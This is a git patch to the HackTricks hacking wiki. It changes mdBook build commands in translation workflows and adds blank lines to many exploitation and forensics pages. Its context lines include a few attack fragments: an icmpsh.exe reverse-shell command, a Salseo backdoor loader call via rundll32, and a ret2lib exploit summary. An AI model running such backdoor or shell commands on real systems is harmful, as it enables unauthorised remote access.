From 61aa4fc5ee7a2cc510e25d47c136850dea24068b Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Thu, 2 Jan 2025 21:57:43 +0100 Subject: [PATCH] translations 4 --- .github/workflows/build_master.yml | 2 +- .github/workflows/translate_af.yml | 2 +- .github/workflows/translate_de.yml | 2 +- .github/workflows/translate_el.yml | 2 +- .github/workflows/translate_es.yml | 2 +- .github/workflows/translate_fr.yml | 2 +- .github/workflows/translate_in.yml | 2 +- .github/workflows/translate_it.yml | 2 +- .github/workflows/translate_ja.yml | 2 +- .github/workflows/translate_ko.yml | 2 +- .github/workflows/translate_pl.yml | 2 +- .github/workflows/translate_pt.yml | 2 +- .github/workflows/translate_sr.yml | 2 +- .github/workflows/translate_sw.yml | 2 +- .github/workflows/translate_tr.yml | 2 +- .github/workflows/translate_uk.yml | 2 +- .github/workflows/translate_zh.yml | 2 +- src/backdoors/icmpsh.md | 2 + src/backdoors/salseo.md | 2 + src/banners/hacktricks-training.md | 2 + .../arbitrary-write-2-exec/README.md | 2 + .../aw2exec-__malloc_hook.md | 2 + .../arbitrary-write-2-exec/aw2exec-got-plt.md | 2 + .../www2exec-.dtors-and-.fini_array.md | 2 + .../arbitrary-write-2-exec/www2exec-atexit.md | 2 + src/binary-exploitation/array-indexing.md | 2 + .../README.md | 2 + .../elf-tricks.md | 2 + .../tools/README.md | 2 + .../tools/pwntools.md | 2 + .../README.md | 2 + .../aslr/README.md | 2 + .../aslr/ret2plt.md | 2 + .../aslr/ret2ret.md | 2 + .../cet-and-shadow-stack.md | 2 + .../libc-protections.md | 2 + .../memory-tagging-extension-mte.md | 2 + .../no-exec-nx.md | 2 + .../pie/README.md | 2 + .../pie/bypassing-canary-and-pie.md | 2 + .../relro.md | 2 + .../stack-canaries/README.md | 2 + .../bf-forked-stack-canaries.md | 2 + .../stack-canaries/print-stack-canary.md | 2 + .../common-exploiting-problems.md | 2 + .../format-strings/README.md | 12 +---- .../format-strings-arbitrary-read-example.md | 2 + .../format-strings/format-strings-template.md | 2 + src/binary-exploitation/integer-overflow.md | 2 + src/binary-exploitation/ios-exploiting.md | 2 + src/binary-exploitation/libc-heap/README.md | 2 + .../libc-heap/bins-and-memory-allocations.md | 2 + .../libc-heap/double-free.md | 2 + .../libc-heap/fast-bin-attack.md | 2 + .../libc-heap/heap-memory-functions/README.md | 2 + .../libc-heap/heap-memory-functions/free.md | 2 + .../heap-functions-security-checks.md | 2 + .../malloc-and-sysmalloc.md | 2 + .../libc-heap/heap-memory-functions/unlink.md | 2 + .../libc-heap/heap-overflow.md | 2 + .../libc-heap/house-of-einherjar.md | 2 + .../libc-heap/house-of-force.md | 2 + .../libc-heap/house-of-lore.md | 2 + .../libc-heap/house-of-orange.md | 2 + .../libc-heap/house-of-rabbit.md | 2 + .../libc-heap/house-of-roman.md | 2 + .../libc-heap/house-of-spirit.md | 2 + .../libc-heap/large-bin-attack.md | 2 + .../libc-heap/off-by-one-overflow.md | 2 + .../libc-heap/overwriting-a-freed-chunk.md | 2 + .../libc-heap/tcache-bin-attack.md | 2 + .../libc-heap/unlink-attack.md | 2 + .../libc-heap/unsorted-bin-attack.md | 2 + .../libc-heap/use-after-free/README.md | 2 + .../libc-heap/use-after-free/first-fit.md | 2 + .../rop-return-oriented-programing/README.md | 2 + .../brop-blind-return-oriented-programming.md | 2 + .../rop-return-oriented-programing/ret2csu.md | 2 + .../ret2dlresolve.md | 2 + .../ret2esp-ret2reg.md | 2 + .../ret2lib/README.md | 2 + .../ret2lib/one-gadget.md | 2 + .../ret2lib/ret2lib-+-printf-leak-arm64.md | 2 + .../rop-leaking-libc-address/README.md | 2 + .../rop-leaking-libc-template.md | 8 +--- .../ret2vdso.md | 2 + .../rop-syscall-execv/README.md | 2 + .../rop-syscall-execv/ret2syscall-arm64.md | 2 + .../README.md | 2 + .../srop-arm64.md | 2 + .../stack-overflow/README.md | 2 + .../stack-overflow/pointer-redirecting.md | 2 + .../stack-overflow/ret2win/README.md | 2 + .../stack-overflow/ret2win/ret2win-arm64.md | 2 + .../stack-pivoting-ebp2ret-ebp-chaining.md | 2 + .../stack-overflow/stack-shellcode/README.md | 2 + .../stack-shellcode/stack-shellcode-arm64.md | 2 + .../stack-overflow/uninitialized-variables.md | 2 + ...windows-exploiting-basic-guide-oscp-lvl.md | 2 + .../README.md | 2 + .../blockchain-and-crypto-currencies.md | 2 + src/crypto-and-stego/certificates.md | 18 +------ .../cipher-block-chaining-cbc-mac-priv.md | 2 + src/crypto-and-stego/crypto-ctfs-tricks.md | 2 + .../cryptographic-algorithms/README.md | 2 + .../unpacking-binaries.md | 2 + .../electronic-code-book-ecb.md | 2 + src/crypto-and-stego/esoteric-languages.md | 2 + .../hash-length-extension-attack.md | 2 + src/crypto-and-stego/padding-oracle-priv.md | 5 +- .../rc4-encrypt-and-decrypt.md | 2 + src/crypto-and-stego/stego-tricks.md | 2 + src/cryptography/certificates.md | 18 +------ .../cipher-block-chaining-cbc-mac-priv.md | 2 + src/cryptography/crypto-ctfs-tricks.md | 2 + src/cryptography/electronic-code-book-ecb.md | 2 + .../hash-length-extension-attack.md | 2 + src/cryptography/padding-oracle-priv.md | 6 +-- src/cryptography/rc4-encrypt-and-decrypt.md | 2 + src/emails-vulns.md | 1 + .../linux-exploiting-basic-esp/README.md | 2 + .../linux-exploiting-basic-esp/fusion.md | 2 + src/exploiting/tools/README.md | 2 + src/exploiting/tools/pwntools.md | 2 + ...windows-exploiting-basic-guide-oscp-lvl.md | 2 + .../basic-forensic-methodology/README.md | 2 + .../anti-forensic-techniques.md | 8 +--- .../docker-forensics.md | 12 +---- .../file-integrity-monitoring.md | 2 + .../linux-forensics.md | 38 --------------- .../malware-analysis.md | 2 + .../memory-dump-analysis/README.md | 14 +----- .../partitions-file-systems-carving/README.md | 2 + .../file-data-carving-recovery-tools.md | 2 + .../file-data-carving-tools.md | 2 + .../pcap-inspection/README.md | 20 +------- .../usb-keyboard-pcap-analysis.md | 2 + .../pcap-inspection/usb-keystrokes.md | 2 + .../pcap-inspection/wifi-pcap-analysis.md | 2 + .../.pyc.md | 12 +---- .../README.md | 2 + .../browser-artifacts.md | 18 +------ .../desofuscation-vbs-cscript.exe.md | 2 + .../local-cloud-storage.md | 17 +------ .../office-file-analysis.md | 17 +------ .../pdf-file-analysis.md | 10 +--- .../png-tricks.md | 2 + .../video-and-audio-file-analysis.md | 12 +---- .../zips-tricks.md | 2 + .../windows-forensics/README.md | 8 +--- .../interesting-windows-registry-keys.md | 2 + .../windows-forensics/windows-processes.md | 2 + src/generic-hacking/brute-force.md | 37 --------------- src/generic-hacking/exfiltration.md | 2 + src/generic-hacking/reverse-shells/README.md | 2 + .../expose-local-to-the-internet.md | 2 + .../reverse-shells/full-ttys.md | 14 +----- src/generic-hacking/reverse-shells/linux.md | 2 + .../reverse-shells/msfvenom.md | 32 +------------ src/generic-hacking/reverse-shells/windows.md | 2 + src/generic-hacking/search-exploits.md | 17 +------ .../tunneling-and-port-forwarding.md | 2 + .../basic-forensic-methodology/README.md | 2 + .../anti-forensic-techniques.md | 2 + .../docker-forensics.md | 12 +---- .../file-integrity-monitoring.md | 2 + .../image-acquisition-and-mount.md | 8 +--- .../linux-forensics.md | 37 --------------- .../malware-analysis.md | 2 + .../memory-dump-analysis/README.md | 14 +----- .../volatility-cheatsheet.md | 25 +--------- .../partitions-file-systems-carving/README.md | 2 + .../file-data-carving-recovery-tools.md | 2 + .../pcap-inspection/README.md | 20 +------- .../pcap-inspection/dnscat-exfiltration.md | 2 + .../suricata-and-iptables-cheatsheet.md | 2 + .../pcap-inspection/usb-keystrokes.md | 2 + .../pcap-inspection/wifi-pcap-analysis.md | 2 + .../pcap-inspection/wireshark-tricks.md | 2 + .../.pyc.md | 12 +---- .../README.md | 2 + .../browser-artifacts.md | 17 +------ .../desofuscation-vbs-cscript.exe.md | 2 + .../local-cloud-storage.md | 17 +------ .../office-file-analysis.md | 17 +------ .../pdf-file-analysis.md | 10 +--- .../png-tricks.md | 2 + .../video-and-audio-file-analysis.md | 2 + .../zips-tricks.md | 2 + .../windows-forensics/README.md | 2 + .../interesting-windows-registry-keys.md | 2 + .../external-recon-methodology/README.md | 15 +----- .../github-leaked-secrets.md | 5 +- .../wide-source-code-search.md | 2 + .../pentesting-methodology.md | 12 +---- .../pentesting-network/README.md | 8 +--- .../pentesting-network/dhcpv6.md | 2 + .../pentesting-network/eigrp-attacks.md | 2 + .../glbp-and-hsrp-attacks.md | 8 +--- .../pentesting-network/ids-evasion.md | 12 +---- .../lateral-vlan-segmentation-bypass.md | 2 + .../network-protocols-explained-esp.md | 2 + .../pentesting-network/nmap-summary-esp.md | 8 +--- .../pentesting-network/pentesting-ipv6.md | 2 + ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 2 + .../spoofing-ssdp-and-upnp-devices.md | 2 + .../pentesting-network/webrtc-dos.md | 2 + .../pentesting-wifi/README.md | 47 +------------------ .../pentesting-wifi/evil-twin-eap-tls.md | 8 +--- .../phishing-methodology/README.md | 2 + .../phishing-methodology/clone-a-website.md | 8 +--- .../phishing-methodology/detecting-phising.md | 2 + .../phishing-documents.md | 2 + .../python/README.md | 17 +------ .../python/basic-python.md | 2 + .../python/bruteforce-hash-few-chars.md | 2 + .../python/bypass-python-sandboxes/README.md | 16 +------ .../load_name-load_const-opcode-oob-read.md | 2 + ...s-pollution-pythons-prototype-pollution.md | 2 + .../python/pyscript.md | 2 + .../python/python-internal-read-gadgets.md | 2 + .../python/venv.md | 17 +------ .../python/web-requests.md | 17 +------ .../threat-modeling.md | 2 + .../escaping-from-gui-applications.md | 2 + .../firmware-analysis/README.md | 2 + .../firmware-analysis/bootloader-testing.md | 2 + .../firmware-analysis/firmware-integrity.md | 2 + .../physical-attacks.md | 2 + src/interesting-http.md | 1 + .../bypass-bash-restrictions/README.md | 20 ++------ .../README.md | 12 +---- .../ddexec.md | 2 + src/linux-hardening/freeipa-pentesting.md | 2 + .../linux-environment-variables.md | 2 + .../linux-post-exploitation/README.md | 2 + .../pam-pluggable-authentication-modules.md | 2 + .../linux-privilege-escalation-checklist.md | 32 +------------ .../privilege-escalation/cisco-vmanage.md | 2 + .../containerd-ctr-privilege-escalation.md | 2 + ...-command-injection-privilege-escalation.md | 2 + .../electron-cef-chromium-debugger-abuse.md | 2 + .../escaping-from-limited-bash.md | 2 + .../privilege-escalation/euid-ruid-suid.md | 12 +---- src/linux-hardening/useful-linux-commands.md | 23 --------- src/online-platforms-with-api.md | 1 + src/other-web-tricks.md | 16 +------ src/pentesting-dns.md | 2 + src/post-exploitation.md | 2 + ...itive-information-disclosure-from-a-web.md | 2 + .../dll-hijacking/README.md | 10 ---- 251 files changed, 473 insertions(+), 783 deletions(-) diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml index 4ef1dbe77..cb330988f 100644 --- a/.github/workflows/build_master.yml +++ b/.github/workflows/build_master.yml @@ -47,7 +47,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=en mdbook build # Cat hacktricks-preprocessor.log #- name: Cat hacktricks-preprocessor.log diff --git a/.github/workflows/translate_af.yml b/.github/workflows/translate_af.yml index 804afe44d..512d02907 100644 --- a/.github/workflows/translate_af.yml +++ b/.github/workflows/translate_af.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_de.yml b/.github/workflows/translate_de.yml index 2f83fefa1..081b1fe5b 100644 --- a/.github/workflows/translate_de.yml +++ b/.github/workflows/translate_de.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_el.yml b/.github/workflows/translate_el.yml index 8857a75b9..4cae868bd 100644 --- a/.github/workflows/translate_el.yml +++ b/.github/workflows/translate_el.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_es.yml b/.github/workflows/translate_es.yml index 8322446a9..0d81e3175 100644 --- a/.github/workflows/translate_es.yml +++ b/.github/workflows/translate_es.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_fr.yml b/.github/workflows/translate_fr.yml index 046fe3b20..7e27b66c7 100644 --- a/.github/workflows/translate_fr.yml +++ b/.github/workflows/translate_fr.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_in.yml b/.github/workflows/translate_in.yml index c9c285a44..f2a65762a 100644 --- a/.github/workflows/translate_in.yml +++ b/.github/workflows/translate_in.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_it.yml b/.github/workflows/translate_it.yml index b5b4ec27c..48d315648 100644 --- a/.github/workflows/translate_it.yml +++ b/.github/workflows/translate_it.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_ja.yml b/.github/workflows/translate_ja.yml index 9c635e1da..f3f385960 100644 --- a/.github/workflows/translate_ja.yml +++ b/.github/workflows/translate_ja.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_ko.yml b/.github/workflows/translate_ko.yml index d39c84266..d031b5dd1 100644 --- a/.github/workflows/translate_ko.yml +++ b/.github/workflows/translate_ko.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_pl.yml b/.github/workflows/translate_pl.yml index 0dd53dd0c..dd879f8f8 100644 --- a/.github/workflows/translate_pl.yml +++ b/.github/workflows/translate_pl.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_pt.yml b/.github/workflows/translate_pt.yml index e8842d728..d65db16a9 100644 --- a/.github/workflows/translate_pt.yml +++ b/.github/workflows/translate_pt.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_sr.yml b/.github/workflows/translate_sr.yml index 4f80bc8d3..7eb6dba86 100644 --- a/.github/workflows/translate_sr.yml +++ b/.github/workflows/translate_sr.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_sw.yml b/.github/workflows/translate_sw.yml index 4c63a2558..f97da69cf 100644 --- a/.github/workflows/translate_sw.yml +++ b/.github/workflows/translate_sw.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_tr.yml b/.github/workflows/translate_tr.yml index 13571575b..a8f74f42e 100644 --- a/.github/workflows/translate_tr.yml +++ b/.github/workflows/translate_tr.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_uk.yml b/.github/workflows/translate_uk.yml index 4991a185c..dab19b876 100644 --- a/.github/workflows/translate_uk.yml +++ b/.github/workflows/translate_uk.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_zh.yml b/.github/workflows/translate_zh.yml index ed59a8d34..67f7e16e5 100644 --- a/.github/workflows/translate_zh.yml +++ b/.github/workflows/translate_zh.yml @@ -105,7 +105,7 @@ jobs: # Build the mdBook - name: Build mdBook - run: mdbook build + run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/src/backdoors/icmpsh.md b/src/backdoors/icmpsh.md index 6c48091a3..440187885 100644 --- a/src/backdoors/icmpsh.md +++ b/src/backdoors/icmpsh.md @@ -29,3 +29,5 @@ icmpsh.exe -t -d 500 -b 30 -s 128 ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/backdoors/salseo.md b/src/backdoors/salseo.md index 90cf5338c..e1bb3be54 100644 --- a/src/backdoors/salseo.md +++ b/src/backdoors/salseo.md @@ -176,3 +176,5 @@ rundll32.exe SalseoLoader.dll,main ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index b03deaf4a..8145bf83f 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -11,3 +11,5 @@ > - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. > > + + diff --git a/src/binary-exploitation/arbitrary-write-2-exec/README.md b/src/binary-exploitation/arbitrary-write-2-exec/README.md index 117d2440a..3bec4cf45 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/README.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md @@ -1,3 +1,5 @@ # Arbitrary Write 2 Exec + + diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md index 7bd874ca8..bbf5c78db 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md @@ -70,3 +70,5 @@ Now a **fast bin attack** is performed: - [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md). {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md index ad09ee48e..28450c1bf 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -87,3 +87,5 @@ The **Full RELRO** protection is meant to protect agains this kind of technique - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md index 31e45fba4..bf34e78a4 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md @@ -54,3 +54,5 @@ In order to abuse **`.fini_array`** to get an eternal loop you can [**check what > In newer versions, even with [**Partial RELRO**] the section **`.fini_array`** is made **read-only** also. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md index 97c286231..9ecd83bb1 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md @@ -236,3 +236,5 @@ To abuse this you need either to **leak or erase the `PTR_MANGLE`cookie** and th You can find an example of this in the [**original blog post about the technique**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure). {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/array-indexing.md b/src/binary-exploitation/array-indexing.md index 675eb939e..6f4531c37 100644 --- a/src/binary-exploitation/array-indexing.md +++ b/src/binary-exploitation/array-indexing.md @@ -16,3 +16,5 @@ However he you can find some nice **examples**: - 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used. - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html) - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check). + + diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md index a5e59ae40..87416ec21 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md @@ -109,3 +109,5 @@ Something to take into account is that usually **just one exploitation of a vuln - [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md index f5886ddcc..e353de7b6 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md @@ -394,3 +394,5 @@ Each variable will hace an entry in the TLS header specifying the size and the T The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md index 70aa57cc5..471c0c1e1 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md @@ -239,3 +239,5 @@ Then, configure the debugger: Debugger (linux remote) --> Proccess options...: ![](<../../../images/image (858).png>) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md index 6175aeaa2..c695e9b51 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md @@ -174,3 +174,5 @@ pwn update ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md index 47681ba71..4b67a7fc2 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md @@ -33,3 +33,5 @@ gdb /path/to/executable /path/to/core_file This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index e33c7a3be..ec26e6da5 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md @@ -302,3 +302,5 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md index c0e55129b..18e620c42 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md @@ -80,3 +80,5 @@ p.interactive() - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md index 19f39dac3..a2e523625 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md @@ -31,3 +31,5 @@ Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overf - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md index 22e1edbc2..4f9b14258 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md @@ -23,3 +23,5 @@ The **shadow stack** is a **dedicated stack used solely for storing return addre - The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md index cacfd7f2f..0888a0db8 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md @@ -82,3 +82,5 @@ Pointer guard is an exploit mitigation technique used in glibc to protect stored - [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md index 43980bbca..39ca23244 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md @@ -82,3 +82,5 @@ When a **mismatch is detected** the kernel will **panic** to prevent further exp - [https://www.youtube.com/watch?v=UwMt0e_dC_Q](https://www.youtube.com/watch?v=UwMt0e_dC_Q) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md index 376dfe6c4..5e8bacf3e 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md @@ -14,3 +14,5 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter - **Ret2...** {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md index 99a33743d..b92435899 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md @@ -30,3 +30,5 @@ bypassing-canary-and-pie.md - [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie) {{#include ../../../banners/hacktricks-training.md}} + + diff --git 